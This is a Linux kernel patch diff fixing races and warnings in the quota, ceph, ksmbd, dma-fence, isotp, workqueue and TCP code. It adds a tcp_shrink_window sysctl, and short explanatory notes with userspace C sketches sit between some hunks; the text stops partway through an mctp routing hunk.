+diff --git a/fs/ceph/inode.c b/fs/ceph/inode.c
+index bad9eeb6a1a59..29384ec1a524c 100644
+--- a/fs/ceph/inode.c
++++ b/fs/ceph/inode.c
+@@ -655,9 +655,7 @@ int ceph_fill_file_size(struct inode *inode, int issued,
+ 			ci->i_truncate_seq = truncate_seq;
+ 
+ 			/* the MDS should have revoked these caps */
+-			WARN_ON_ONCE(issued & (CEPH_CAP_FILE_EXCL |
+-					       CEPH_CAP_FILE_RD |
+-					       CEPH_CAP_FILE_WR |
++			WARN_ON_ONCE(issued & (CEPH_CAP_FILE_RD |
+ 					       CEPH_CAP_FILE_LAZYIO));
+ 			/*
+ 			 * If we hold relevant caps, or in the case where we're
+diff --git a/fs/quota/dquot.c b/fs/quota/dquot.c
+index 53b65c5300fde..f26ddfcaa5e61 100644
+--- a/fs/quota/dquot.c
++++ b/fs/quota/dquot.c
+@@ -233,19 +233,18 @@ static void put_quota_format(struct quota_format_type *fmt)
+  * All dquots are placed to the end of inuse_list when first created, and this
+  * list is used for invalidate operation, which must look at every dquot.
+  *
+- * When the last reference of a dquot will be dropped, the dquot will be
+- * added to releasing_dquots. We'd then queue work item which would call
++ * When the last reference of a dquot is dropped, the dquot is added to
++ * releasing_dquots. We'll then queue work item which will call
+  * synchronize_srcu() and after that perform the final cleanup of all the
+- * dquots on the list. Both releasing_dquots and free_dquots use the
+- * dq_free list_head in the dquot struct. When a dquot is removed from
+- * releasing_dquots, a reference count is always subtracted, and if
+- * dq_count == 0 at that point, the dquot will be added to the free_dquots.
++ * dquots on the list. Each cleaned up dquot is moved to free_dquots list.
++ * Both releasing_dquots and free_dquots use the dq_free list_head in the dquot
++ * struct.
+  *
+- * Unused dquots (dq_count == 0) are added to the free_dquots list when freed,
+- * and this list is searched whenever we need an available dquot.  Dquots are
+- * removed from the list as soon as they are used again, and
+- * dqstats.free_dquots gives the number of dquots on the list. When
+- * dquot is invalidated it's completely released from memory.
++ * Unused and cleaned up dquots are in the free_dquots list and this list is
++ * searched whenever we need an available dquot. Dquots are removed from the
++ * list as soon as they are used again and dqstats.free_dquots gives the number
++ * of dquots on the list. When dquot is invalidated it's completely released
++ * from memory.
+  *
+  * Dirty dquots are added to the dqi_dirty_list of quota_info when mark
+  * dirtied, and this list is searched when writing dirty dquots back to
+@@ -321,6 +320,7 @@ static inline void put_dquot_last(struct dquot *dquot)
+ static inline void put_releasing_dquots(struct dquot *dquot)
+ {
+ 	list_add_tail(&dquot->dq_free, &releasing_dquots);
++	set_bit(DQ_RELEASING_B, &dquot->dq_flags);
+ }
+ 
+ static inline void remove_free_dquot(struct dquot *dquot)
+@@ -328,8 +328,10 @@ static inline void remove_free_dquot(struct dquot *dquot)
+ 	if (list_empty(&dquot->dq_free))
+ 		return;
+ 	list_del_init(&dquot->dq_free);
+-	if (!atomic_read(&dquot->dq_count))
++	if (!test_bit(DQ_RELEASING_B, &dquot->dq_flags))
+ 		dqstats_dec(DQST_FREE_DQUOTS);
++	else
++		clear_bit(DQ_RELEASING_B, &dquot->dq_flags);
+ }
+ 
+ static inline void put_inuse(struct dquot *dquot)
+@@ -581,12 +583,6 @@ restart:
+ 			continue;
+ 		/* Wait for dquot users */
+ 		if (atomic_read(&dquot->dq_count)) {
+-			/* dquot in releasing_dquots, flush and retry */
+-			if (!list_empty(&dquot->dq_free)) {
+-				spin_unlock(&dq_list_lock);
+-				goto restart;
+-			}
+-
+ 			atomic_inc(&dquot->dq_count);
+ 			spin_unlock(&dq_list_lock);
+ 			/*
+@@ -605,6 +601,15 @@ restart:
+ 			 * restart. */
+ 			goto restart;
+ 		}
++		/*
++		 * The last user already dropped its reference but dquot didn't
++		 * get fully cleaned up yet. Restart the scan which flushes the
++		 * work cleaning up released dquots.
++		 */
++		if (test_bit(DQ_RELEASING_B, &dquot->dq_flags)) {
++			spin_unlock(&dq_list_lock);
++			goto restart;
++		}
+ 		/*
+ 		 * Quota now has no users and it has been written on last
+ 		 * dqput()
+@@ -696,6 +701,13 @@ int dquot_writeback_dquots(struct super_block *sb, int type)
+ 						 dq_dirty);
+ 
+ 			WARN_ON(!dquot_active(dquot));
++			/* If the dquot is being released we should not touch it */
++			if (test_bit(DQ_RELEASING_B, &dquot->dq_flags)) {
++				spin_unlock(&dq_list_lock);
++				flush_delayed_work(&quota_release_work);
++				spin_lock(&dq_list_lock);
++				continue;
++			}
+ 
+ 			/* Now we have active dquot from which someone is
+  			 * holding reference so we can safely just increase
+@@ -809,18 +821,18 @@ static void quota_release_workfn(struct work_struct *work)
+ 	/* Exchange the list head to avoid livelock. */
+ 	list_replace_init(&releasing_dquots, &rls_head);
+ 	spin_unlock(&dq_list_lock);
++	synchronize_srcu(&dquot_srcu);
+ 
+ restart:
+-	synchronize_srcu(&dquot_srcu);
+ 	spin_lock(&dq_list_lock);
+ 	while (!list_empty(&rls_head)) {
+ 		dquot = list_first_entry(&rls_head, struct dquot, dq_free);
+-		/* Dquot got used again? */
+-		if (atomic_read(&dquot->dq_count) > 1) {
+-			remove_free_dquot(dquot);
+-			atomic_dec(&dquot->dq_count);
+-			continue;
+-		}
++		WARN_ON_ONCE(atomic_read(&dquot->dq_count));
++		/*
++		 * Note that DQ_RELEASING_B protects us from racing with
++		 * invalidate_dquots() calls so we are safe to work with the
++		 * dquot even after we drop dq_list_lock.
++		 */
+ 		if (dquot_dirty(dquot)) {
+ 			spin_unlock(&dq_list_lock);
+ 			/* Commit dquot before releasing */
+@@ -834,7 +846,6 @@ restart:
+ 		}
+ 		/* Dquot is inactive and clean, now move it to free list */
+ 		remove_free_dquot(dquot);
+-		atomic_dec(&dquot->dq_count);
+ 		put_dquot_last(dquot);
+ 	}
+ 	spin_unlock(&dq_list_lock);
+@@ -875,6 +886,7 @@ void dqput(struct dquot *dquot)
+ 	BUG_ON(!list_empty(&dquot->dq_free));
+ #endif
+ 	put_releasing_dquots(dquot);
++	atomic_dec(&dquot->dq_count);
+ 	spin_unlock(&dq_list_lock);
+ 	queue_delayed_work(system_unbound_wq, &quota_release_work, 1);
+ }
+@@ -963,7 +975,7 @@ we_slept:
+ 		dqstats_inc(DQST_LOOKUPS);
+ 	}
+ 	/* Wait for dq_lock - after this we know that either dquot_release() is
+-	 * already finished or it will be canceled due to dq_count > 1 test */
++	 * already finished or it will be canceled due to dq_count > 0 test */
+ 	wait_on_dquot(dquot);
+ 	/* Read the dquot / allocate space in quota file */
+ 	if (!dquot_active(dquot)) {
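
The quota rework above retires the "hold a dq_count reference while releasing" trick in favour of a dedicated DQ_RELEASING_B flag bit in dq_flags. For readers unfamiliar with the set_bit()/test_bit()/clear_bit() primitives it leans on, a minimal userspace sketch using C11 atomics -- the helper names are illustrative, not the kernel implementation:

#include <stdatomic.h>
#include <stdio.h>

#define DQ_MOD_B       0
#define DQ_RELEASING_B 6

static atomic_ulong dq_flags;

static void set_bit_u(int nr, atomic_ulong *p)   { atomic_fetch_or(p, 1UL << nr); }
static void clear_bit_u(int nr, atomic_ulong *p) { atomic_fetch_and(p, ~(1UL << nr)); }
static int  test_bit_u(int nr, atomic_ulong *p)  { return (atomic_load(p) >> nr) & 1; }

int main(void)
{
	set_bit_u(DQ_RELEASING_B, &dq_flags);        /* dquot queued for release */
	printf("releasing? %d\n", test_bit_u(DQ_RELEASING_B, &dq_flags));
	clear_bit_u(DQ_RELEASING_B, &dq_flags);      /* cleanup done, back on free list */
	printf("releasing? %d\n", test_bit_u(DQ_RELEASING_B, &dq_flags));
	return 0;
}
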
+diff --git a/fs/smb/server/vfs_cache.c b/fs/smb/server/vfs_cache.c
+index 0ae5dd0829e92..6ec6c129465d3 100644
+--- a/fs/smb/server/vfs_cache.c
++++ b/fs/smb/server/vfs_cache.c
+@@ -105,7 +105,7 @@ int ksmbd_query_inode_status(struct inode *inode)
+ 	ci = __ksmbd_inode_lookup(inode);
+ 	if (ci) {
+ 		ret = KSMBD_INODE_STATUS_OK;
+-		if (ci->m_flags & S_DEL_PENDING)
++		if (ci->m_flags & (S_DEL_PENDING | S_DEL_ON_CLS))
+ 			ret = KSMBD_INODE_STATUS_PENDING_DELETE;
+ 		atomic_dec(&ci->m_count);
+ 	}
+@@ -115,7 +115,7 @@ int ksmbd_query_inode_status(struct inode *inode)
+ 
+ bool ksmbd_inode_pending_delete(struct ksmbd_file *fp)
+ {
+-	return (fp->f_ci->m_flags & S_DEL_PENDING);
++	return (fp->f_ci->m_flags & (S_DEL_PENDING | S_DEL_ON_CLS));
+ }
+ 
+ void ksmbd_set_inode_pending_delete(struct ksmbd_file *fp)
+diff --git a/include/linux/dma-fence.h b/include/linux/dma-fence.h
+index be572c3a4dcdd..3dfb994312b1f 100644
+--- a/include/linux/dma-fence.h
++++ b/include/linux/dma-fence.h
+@@ -548,6 +548,25 @@ static inline void dma_fence_set_error(struct dma_fence *fence,
+ 	fence->error = error;
+ }
+ 
++/**
++ * dma_fence_timestamp - helper to get the completion timestamp of a fence
++ * @fence: fence to get the timestamp from.
++ *
++ * After a fence is signaled the timestamp is updated with the signaling time,
++ * but setting the timestamp can race with tasks waiting for the signaling. This
++ * helper busy waits for the correct timestamp to appear.
++ */
++static inline ktime_t dma_fence_timestamp(struct dma_fence *fence)
++{
++	if (WARN_ON(!test_bit(DMA_FENCE_FLAG_SIGNALED_BIT, &fence->flags)))
++		return ktime_get();
++
++	while (!test_bit(DMA_FENCE_FLAG_TIMESTAMP_BIT, &fence->flags))
++		cpu_relax();
++
++	return fence->timestamp;
++}
++
+ signed long dma_fence_wait_timeout(struct dma_fence *,
+ 				   bool intr, signed long timeout);
+ signed long dma_fence_wait_any_timeout(struct dma_fence **fences,
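
The new dma_fence_timestamp() helper closes a window where DMA_FENCE_FLAG_SIGNALED_BIT is already visible but the timestamp store has not landed yet, by spinning until DMA_FENCE_FLAG_TIMESTAMP_BIT appears. A rough userspace analogue of that logic, with C11 atomics standing in for the kernel bit ops (illustrative only):

#include <stdatomic.h>
#include <stdio.h>

#define SIGNALED_BIT  0
#define TIMESTAMP_BIT 1

struct fence {
	atomic_ulong flags;
	long long timestamp_ns;
};

/* Busy-wait until the signaler has published a valid timestamp. */
static long long fence_timestamp(struct fence *f)
{
	if (!(atomic_load(&f->flags) & (1UL << SIGNALED_BIT)))
		return -1; /* the kernel helper WARNs and falls back to "now" */

	while (!(atomic_load(&f->flags) & (1UL << TIMESTAMP_BIT)))
		; /* cpu_relax() in the kernel */

	return f->timestamp_ns;
}

int main(void)
{
	struct fence f = { 0 };

	f.timestamp_ns = 12345;                      /* signaler stores the time... */
	atomic_store(&f.flags, (1UL << SIGNALED_BIT) | (1UL << TIMESTAMP_BIT));
	printf("%lld\n", fence_timestamp(&f));       /* ...then readers may consume it */
	return 0;
}
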
+diff --git a/include/linux/libata.h b/include/linux/libata.h
+index a9ec8d97a715b..45910aebc3778 100644
+--- a/include/linux/libata.h
++++ b/include/linux/libata.h
+@@ -189,6 +189,7 @@ enum {
+ 	ATA_PFLAG_UNLOADING	= (1 << 9), /* driver is being unloaded */
+ 	ATA_PFLAG_UNLOADED	= (1 << 10), /* driver is unloaded */
+ 
++	ATA_PFLAG_RESUMING	= (1 << 16),  /* port is being resumed */
+ 	ATA_PFLAG_SUSPENDED	= (1 << 17), /* port is suspended (power) */
+ 	ATA_PFLAG_PM_PENDING	= (1 << 18), /* PM operation pending */
+ 	ATA_PFLAG_INIT_GTM_VALID = (1 << 19), /* initial gtm data valid */
+@@ -311,8 +312,10 @@ enum {
+ 	ATA_EH_RESET		= ATA_EH_SOFTRESET | ATA_EH_HARDRESET,
+ 	ATA_EH_ENABLE_LINK	= (1 << 3),
+ 	ATA_EH_PARK		= (1 << 5), /* unload heads and stop I/O */
++	ATA_EH_SET_ACTIVE	= (1 << 6), /* Set a device to active power mode */
+ 
+-	ATA_EH_PERDEV_MASK	= ATA_EH_REVALIDATE | ATA_EH_PARK,
++	ATA_EH_PERDEV_MASK	= ATA_EH_REVALIDATE | ATA_EH_PARK |
++				  ATA_EH_SET_ACTIVE,
+ 	ATA_EH_ALL_ACTIONS	= ATA_EH_REVALIDATE | ATA_EH_RESET |
+ 				  ATA_EH_ENABLE_LINK,
+ 
+@@ -350,7 +353,7 @@ enum {
+ 	/* This should match the actual table size of
+ 	 * ata_eh_cmd_timeout_table in libata-eh.c.
+ 	 */
+-	ATA_EH_CMD_TIMEOUT_TABLE_SIZE = 7,
++	ATA_EH_CMD_TIMEOUT_TABLE_SIZE = 8,
+ 
+ 	/* Horkage types. May be set by libata or controller on drives
+ 	   (some horkage may be drive/controller pair dependent */
+diff --git a/include/linux/mcb.h b/include/linux/mcb.h
+index f6efb16f9d1b4..91ec9a83149e8 100644
+--- a/include/linux/mcb.h
++++ b/include/linux/mcb.h
+@@ -63,7 +63,6 @@ static inline struct mcb_bus *to_mcb_bus(struct device *dev)
+ struct mcb_device {
+ 	struct device dev;
+ 	struct mcb_bus *bus;
+-	bool is_added;
+ 	struct mcb_driver *driver;
+ 	u16 id;
+ 	int inst;
+diff --git a/include/linux/quota.h b/include/linux/quota.h
+index fd692b4a41d5f..07071e64abf3d 100644
+--- a/include/linux/quota.h
++++ b/include/linux/quota.h
+@@ -285,7 +285,9 @@ static inline void dqstats_dec(unsigned int type)
+ #define DQ_FAKE_B	3	/* no limits only usage */
+ #define DQ_READ_B	4	/* dquot was read into memory */
+ #define DQ_ACTIVE_B	5	/* dquot is active (dquot_release not called) */
+-#define DQ_LASTSET_B	6	/* Following 6 bits (see QIF_) are reserved\
++#define DQ_RELEASING_B	6	/* dquot is in releasing_dquots list waiting
++				 * to be cleaned up */
++#define DQ_LASTSET_B	7	/* Following 6 bits (see QIF_) are reserved\
+ 				 * for the mask of entries set via SETQUOTA\
+ 				 * quotactl. They are set under dq_data_lock\
+ 				 * and the quota format handling dquot can\
+diff --git a/include/linux/quotaops.h b/include/linux/quotaops.h
+index 0d8625d717339..3abd249ec3373 100644
+--- a/include/linux/quotaops.h
++++ b/include/linux/quotaops.h
+@@ -57,7 +57,7 @@ static inline bool dquot_is_busy(struct dquot *dquot)
+ {
+ 	if (test_bit(DQ_MOD_B, &dquot->dq_flags))
+ 		return true;
+-	if (atomic_read(&dquot->dq_count) > 1)
++	if (atomic_read(&dquot->dq_count) > 0)
+ 		return true;
+ 	return false;
+ }
+diff --git a/include/net/macsec.h b/include/net/macsec.h
+index 5b9c61c4d3a62..65c93959c2dc5 100644
+--- a/include/net/macsec.h
++++ b/include/net/macsec.h
+@@ -257,6 +257,7 @@ struct macsec_context {
+ 	struct macsec_secy *secy;
+ 	struct macsec_rx_sc *rx_sc;
+ 	struct {
++		bool update_pn;
+ 		unsigned char assoc_num;
+ 		u8 key[MACSEC_MAX_KEY_LEN];
+ 		union {
+diff --git a/include/net/netns/ipv4.h b/include/net/netns/ipv4.h
+index 1b80046794451..ede2ff1da53a3 100644
+--- a/include/net/netns/ipv4.h
++++ b/include/net/netns/ipv4.h
+@@ -64,6 +64,7 @@ struct netns_ipv4 {
+ #endif
+ 	bool			fib_has_custom_local_routes;
+ 	bool			fib_offload_disabled;
++	u8			sysctl_tcp_shrink_window;
+ #ifdef CONFIG_IP_ROUTE_CLASSID
+ 	atomic_t		fib_num_tclassid_users;
+ #endif
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 3052680201e57..eb3f52be115d6 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -10778,7 +10778,7 @@ static int check_return_code(struct bpf_verifier_env *env)
+ 	struct tnum enforce_attach_type_range = tnum_unknown;
+ 	const struct bpf_prog *prog = env->prog;
+ 	struct bpf_reg_state *reg;
+-	struct tnum range = tnum_range(0, 1);
++	struct tnum range = tnum_range(0, 1), const_0 = tnum_const(0);
+ 	enum bpf_prog_type prog_type = resolve_prog_type(env->prog);
+ 	int err;
+ 	struct bpf_func_state *frame = env->cur_state->frame[0];
+@@ -10826,8 +10826,8 @@ static int check_return_code(struct bpf_verifier_env *env)
+ 			return -EINVAL;
+ 		}
+ 
+-		if (!tnum_in(tnum_const(0), reg->var_off)) {
+-			verbose_invalid_scalar(env, reg, &range, "async callback", "R0");
++		if (!tnum_in(const_0, reg->var_off)) {
++			verbose_invalid_scalar(env, reg, &const_0, "async callback", "R0");
+ 			return -EINVAL;
+ 		}
+ 		return 0;
+diff --git a/kernel/cgroup/cgroup-v1.c b/kernel/cgroup/cgroup-v1.c
+index 5407241dbb45f..289cc873cb719 100644
+--- a/kernel/cgroup/cgroup-v1.c
++++ b/kernel/cgroup/cgroup-v1.c
+@@ -360,10 +360,9 @@ static int pidlist_array_load(struct cgroup *cgrp, enum cgroup_filetype type,
+ 	}
+ 	css_task_iter_end(&it);
+ 	length = n;
+-	/* now sort & (if procs) strip out duplicates */
++	/* now sort & strip out duplicates (tgids or recycled thread PIDs) */
+ 	sort(array, length, sizeof(pid_t), cmppid, NULL);
+-	if (type == CGROUP_FILE_PROCS)
+-		length = pidlist_uniq(array, length);
++	length = pidlist_uniq(array, length);
+ 
+ 	l = cgroup_pidlist_find_create(cgrp, type);
+ 	if (!l) {
+diff --git a/kernel/workqueue.c b/kernel/workqueue.c
+index 1e1557e42d2cc..bc1a97ee40b21 100644
+--- a/kernel/workqueue.c
++++ b/kernel/workqueue.c
+@@ -5355,9 +5355,13 @@ static int workqueue_apply_unbound_cpumask(const cpumask_var_t unbound_cpumask)
+ 	list_for_each_entry(wq, &workqueues, list) {
+ 		if (!(wq->flags & WQ_UNBOUND))
+ 			continue;
++
+ 		/* creating multiple pwqs breaks ordering guarantee */
+-		if (wq->flags & __WQ_ORDERED)
+-			continue;
++		if (!list_empty(&wq->pwqs)) {
++			if (wq->flags & __WQ_ORDERED_EXPLICIT)
++				continue;
++			wq->flags &= ~__WQ_ORDERED;
++		}
+ 
+ 		ctx = apply_wqattrs_prepare(wq, wq->unbound_attrs, unbound_cpumask);
+ 		if (!ctx) {
+diff --git a/net/can/isotp.c b/net/can/isotp.c
+index 8c97f4061ffd7..545889935d39c 100644
+--- a/net/can/isotp.c
++++ b/net/can/isotp.c
+@@ -925,21 +925,18 @@ static int isotp_sendmsg(struct socket *sock, struct msghdr *msg, size_t size)
+ 	if (!so->bound || so->tx.state == ISOTP_SHUTDOWN)
+ 		return -EADDRNOTAVAIL;
+ 
+-wait_free_buffer:
+-	/* we do not support multiple buffers - for now */
+-	if (wq_has_sleeper(&so->wait) && (msg->msg_flags & MSG_DONTWAIT))
+-		return -EAGAIN;
++	while (cmpxchg(&so->tx.state, ISOTP_IDLE, ISOTP_SENDING) != ISOTP_IDLE) {
++		/* we do not support multiple buffers - for now */
++		if (msg->msg_flags & MSG_DONTWAIT)
++			return -EAGAIN;
+ 
+-	/* wait for complete transmission of current pdu */
+-	err = wait_event_interruptible(so->wait, so->tx.state == ISOTP_IDLE);
+-	if (err)
+-		goto err_event_drop;
+-
+-	if (cmpxchg(&so->tx.state, ISOTP_IDLE, ISOTP_SENDING) != ISOTP_IDLE) {
+ 		if (so->tx.state == ISOTP_SHUTDOWN)
+ 			return -EADDRNOTAVAIL;
+ 
+-		goto wait_free_buffer;
++		/* wait for complete transmission of current pdu */
++		err = wait_event_interruptible(so->wait, so->tx.state == ISOTP_IDLE);
++		if (err)
++			goto err_event_drop;
+ 	}
+ 
+ 	if (!size || size > MAX_MSG_LENGTH) {
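
The isotp_sendmsg() rework folds the wait into a single cmpxchg() acquire loop, avoiding the lost-wakeup race of the old wq_has_sleeper() check. The shape of that loop in a hedged userspace sketch -- state names are borrowed from the patch and the blocking wait is stubbed out:

#include <stdatomic.h>
#include <stdio.h>

enum { ISOTP_IDLE, ISOTP_SENDING };

static atomic_int tx_state = ISOTP_IDLE;

static int try_acquire_tx(int nonblock)
{
	int expected = ISOTP_IDLE;

	while (!atomic_compare_exchange_strong(&tx_state, &expected, ISOTP_SENDING)) {
		if (nonblock)
			return -1;          /* -EAGAIN in the kernel */
		/* real code: wait_event_interruptible(so->wait, state == IDLE) */
		expected = ISOTP_IDLE;      /* CAS clobbered it; reset and retry */
	}
	return 0;
}

int main(void)
{
	printf("first acquire:  %d\n", try_acquire_tx(1));  /* 0: we own the buffer */
	printf("second acquire: %d\n", try_acquire_tx(1));  /* -1: already sending */
	return 0;
}
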
+diff --git a/net/ceph/messenger.c b/net/ceph/messenger.c
+index 09feb3f1fcaa3..b9b64a2427caf 100644
+--- a/net/ceph/messenger.c
++++ b/net/ceph/messenger.c
+@@ -454,8 +454,8 @@ int ceph_tcp_connect(struct ceph_connection *con)
+ 	set_sock_callbacks(sock, con);
+ 
+ 	con_sock_state_connecting(con);
+-	ret = sock->ops->connect(sock, (struct sockaddr *)&ss, sizeof(ss),
+-				 O_NONBLOCK);
++	ret = kernel_connect(sock, (struct sockaddr *)&ss, sizeof(ss),
++			     O_NONBLOCK);
+ 	if (ret == -EINPROGRESS) {
+ 		dout("connect %s EINPROGRESS sk_state = %u\n",
+ 		     ceph_pr_addr(&con->peer_addr),
+diff --git a/net/core/dev.c b/net/core/dev.c
+index a2e3c6470ab3f..5374761f5af2c 100644
+--- a/net/core/dev.c
++++ b/net/core/dev.c
+@@ -3274,15 +3274,19 @@ int skb_checksum_help(struct sk_buff *skb)
+ 
+ 	offset = skb_checksum_start_offset(skb);
+ 	ret = -EINVAL;
+-	if (WARN_ON_ONCE(offset >= skb_headlen(skb))) {
++	if (unlikely(offset >= skb_headlen(skb))) {
+ 		DO_ONCE_LITE(skb_dump, KERN_ERR, skb, false);
++		WARN_ONCE(true, "offset (%d) >= skb_headlen() (%u)\n",
++			  offset, skb_headlen(skb));
+ 		goto out;
+ 	}
+ 	csum = skb_checksum(skb, offset, skb->len - offset, 0);
+ 
+ 	offset += skb->csum_offset;
+-	if (WARN_ON_ONCE(offset + sizeof(__sum16) > skb_headlen(skb))) {
++	if (unlikely(offset + sizeof(__sum16) > skb_headlen(skb))) {
+ 		DO_ONCE_LITE(skb_dump, KERN_ERR, skb, false);
++		WARN_ONCE(true, "offset+2 (%zu) > skb_headlen() (%u)\n",
++			  offset + sizeof(__sum16), skb_headlen(skb));
+ 		goto out;
+ 	}
+ 	ret = skb_ensure_writable(skb, offset + sizeof(__sum16));
+diff --git a/net/ipv4/sysctl_net_ipv4.c b/net/ipv4/sysctl_net_ipv4.c
+index f68762ce4d8a3..73e5821584c18 100644
+--- a/net/ipv4/sysctl_net_ipv4.c
++++ b/net/ipv4/sysctl_net_ipv4.c
+@@ -1387,6 +1387,15 @@ static struct ctl_table ipv4_net_table[] = {
+ 		.extra1		= SYSCTL_ZERO,
+ 		.extra2		= SYSCTL_TWO,
+ 	},
++	{
++		.procname	= "tcp_shrink_window",
++		.data		= &init_net.ipv4.sysctl_tcp_shrink_window,
++		.maxlen		= sizeof(u8),
++		.mode		= 0644,
++		.proc_handler	= proc_dou8vec_minmax,
++		.extra1		= SYSCTL_ZERO,
++		.extra2		= SYSCTL_ONE,
++	},
+ 	{ }
+ };
+ 
+diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c
+index f9b8a4a1d2edc..5df19f93f86ab 100644
+--- a/net/ipv4/tcp_ipv4.c
++++ b/net/ipv4/tcp_ipv4.c
+@@ -3221,6 +3221,8 @@ static int __net_init tcp_sk_init(struct net *net)
+ 	else
+ 		net->ipv4.tcp_congestion_control = &tcp_reno;
+ 
++	net->ipv4.sysctl_tcp_shrink_window = 0;
++
+ 	return 0;
+ }
+ 
+diff --git a/net/ipv4/tcp_output.c b/net/ipv4/tcp_output.c
+index 5921b0f6f9f41..443b1cab25299 100644
+--- a/net/ipv4/tcp_output.c
++++ b/net/ipv4/tcp_output.c
+@@ -259,8 +259,8 @@ static u16 tcp_select_window(struct sock *sk)
+ 	u32 old_win = tp->rcv_wnd;
+ 	u32 cur_win = tcp_receive_window(tp);
+ 	u32 new_win = __tcp_select_window(sk);
++	struct net *net = sock_net(sk);
+ 
+-	/* Never shrink the offered window */
+ 	if (new_win < cur_win) {
+ 		/* Danger Will Robinson!
+ 		 * Don't update rcv_wup/rcv_wnd here or else
+@@ -269,11 +269,14 @@ static u16 tcp_select_window(struct sock *sk)
+ 		 *
+ 		 * Relax Will Robinson.
+ 		 */
+-		if (new_win == 0)
+-			NET_INC_STATS(sock_net(sk),
+-				      LINUX_MIB_TCPWANTZEROWINDOWADV);
+-		new_win = ALIGN(cur_win, 1 << tp->rx_opt.rcv_wscale);
++		if (!READ_ONCE(net->ipv4.sysctl_tcp_shrink_window) || !tp->rx_opt.rcv_wscale) {
++			/* Never shrink the offered window */
++			if (new_win == 0)
++				NET_INC_STATS(net, LINUX_MIB_TCPWANTZEROWINDOWADV);
++			new_win = ALIGN(cur_win, 1 << tp->rx_opt.rcv_wscale);
++		}
+ 	}
++
+ 	tp->rcv_wnd = new_win;
+ 	tp->rcv_wup = tp->rcv_nxt;
+ 
+@@ -281,7 +284,7 @@ static u16 tcp_select_window(struct sock *sk)
+ 	 * scaled window.
+ 	 */
+ 	if (!tp->rx_opt.rcv_wscale &&
+-	    READ_ONCE(sock_net(sk)->ipv4.sysctl_tcp_workaround_signed_windows))
++	    READ_ONCE(net->ipv4.sysctl_tcp_workaround_signed_windows))
+ 		new_win = min(new_win, MAX_TCP_WINDOW);
+ 	else
+ 		new_win = min(new_win, (65535U << tp->rx_opt.rcv_wscale));
+@@ -293,10 +296,9 @@ static u16 tcp_select_window(struct sock *sk)
+ 	if (new_win == 0) {
+ 		tp->pred_flags = 0;
+ 		if (old_win)
+-			NET_INC_STATS(sock_net(sk),
+-				      LINUX_MIB_TCPTOZEROWINDOWADV);
++			NET_INC_STATS(net, LINUX_MIB_TCPTOZEROWINDOWADV);
+ 	} else if (old_win == 0) {
+-		NET_INC_STATS(sock_net(sk), LINUX_MIB_TCPFROMZEROWINDOWADV);
++		NET_INC_STATS(net, LINUX_MIB_TCPFROMZEROWINDOWADV);
+ 	}
+ 
+ 	return new_win;
+@@ -2949,6 +2951,7 @@ u32 __tcp_select_window(struct sock *sk)
+ {
+ 	struct inet_connection_sock *icsk = inet_csk(sk);
+ 	struct tcp_sock *tp = tcp_sk(sk);
++	struct net *net = sock_net(sk);
+ 	/* MSS for the peer's data.  Previous versions used mss_clamp
+ 	 * here.  I don't know if the value based on our guesses
+ 	 * of peer's MSS is better for the performance.  It's more correct
+@@ -2970,6 +2973,15 @@ u32 __tcp_select_window(struct sock *sk)
+ 		if (mss <= 0)
+ 			return 0;
+ 	}
++
++	/* Only allow window shrink if the sysctl is enabled and we have
++	 * a non-zero scaling factor in effect.
++	 */
++	if (READ_ONCE(net->ipv4.sysctl_tcp_shrink_window) && tp->rx_opt.rcv_wscale)
++		goto shrink_window_allowed;
++
++	/* do not allow window to shrink */
++
+ 	if (free_space < (full_space >> 1)) {
+ 		icsk->icsk_ack.quick = 0;
+ 
+@@ -3024,6 +3036,36 @@ u32 __tcp_select_window(struct sock *sk)
+ 	}
+ 
+ 	return window;
++
++shrink_window_allowed:
++	/* new window should always be an exact multiple of scaling factor */
++	free_space = round_down(free_space, 1 << tp->rx_opt.rcv_wscale);
++
++	if (free_space < (full_space >> 1)) {
++		icsk->icsk_ack.quick = 0;
++
++		if (tcp_under_memory_pressure(sk))
++			tcp_adjust_rcv_ssthresh(sk);
++
++		/* if free space is too low, return a zero window */
++		if (free_space < (allowed_space >> 4) || free_space < mss ||
++			free_space < (1 << tp->rx_opt.rcv_wscale))
++			return 0;
++	}
++
++	if (free_space > tp->rcv_ssthresh) {
++		free_space = tp->rcv_ssthresh;
++		/* new window should always be an exact multiple of scaling factor
++		 *
++		 * For this case, we ALIGN "up" (increase free_space) because
++		 * we know free_space is not zero here, it has been reduced from
++		 * the memory-based limit, and rcv_ssthresh is not a hard limit
++		 * (unlike sk_rcvbuf).
++		 */
++		free_space = ALIGN(free_space, (1 << tp->rx_opt.rcv_wscale));
++	}
++
++	return free_space;
+ }
+ 
+ void tcp_skb_collapse_tstamp(struct sk_buff *skb,
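
With tcp_shrink_window enabled, the new shrink path keeps every advertised window an exact multiple of 1 << rcv_wscale: round_down() against the memory-based limit, ALIGN() up against rcv_ssthresh (a soft limit, unlike sk_rcvbuf). The arithmetic as a standalone sketch; the macro definitions are illustrative stand-ins for the kernel's round_down()/ALIGN():

#include <stdio.h>

/* Round x down / up to a multiple of the (power-of-two) scale step. */
#define ROUND_DOWN(x, step) ((x) & ~((step) - 1))
#define ALIGN_UP(x, step)   (((x) + (step) - 1) & ~((step) - 1))

int main(void)
{
	unsigned int rcv_wscale = 7;               /* e.g. 128-byte granularity */
	unsigned int step = 1U << rcv_wscale;
	unsigned int free_space = 70000;

	printf("round_down: %u\n", ROUND_DOWN(free_space, step)); /* 69888 */
	printf("align up:   %u\n", ALIGN_UP(free_space, step));   /* 70016 */
	return 0;
}
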
+diff --git a/net/mctp/route.c b/net/mctp/route.c
+index f51a05ec71624..68be8f2b622dd 100644
+--- a/net/mctp/route.c
++++ b/net/mctp/route.c
+@@ -737,6 +737,8 @@ struct mctp_route *mctp_route_lookup(struct net *net, unsigned int dnet,
+ {
+ 	struct mctp_route *tmp, *rt = NULL;
+ 
++	rcu_read_lock();
++
+ 	list_for_each_entry_rcu(tmp, &net->mctp.routes, list) {
+ 		/* TODO: add metrics */
+ 		if (mctp_rt_match_eid(tmp, dnet, daddr)) {
+@@ -747,21 +749,29 @@ struct mctp_route *mctp_route_lookup(struct net *net, unsigned int dnet,
+ 		}
+ 	}
+ 
++	rcu_read_unlock();
++
+ 	return rt;
+ }
+ 
+ static struct mctp_route *mctp_route_lookup_null(struct net *net,
+ 						 struct net_device *dev)
+ {
+-	struct mctp_route *rt;
++	struct mctp_route *tmp, *rt = NULL;
+ 
+-	list_for_each_entry_rcu(rt, &net->mctp.routes, list) {
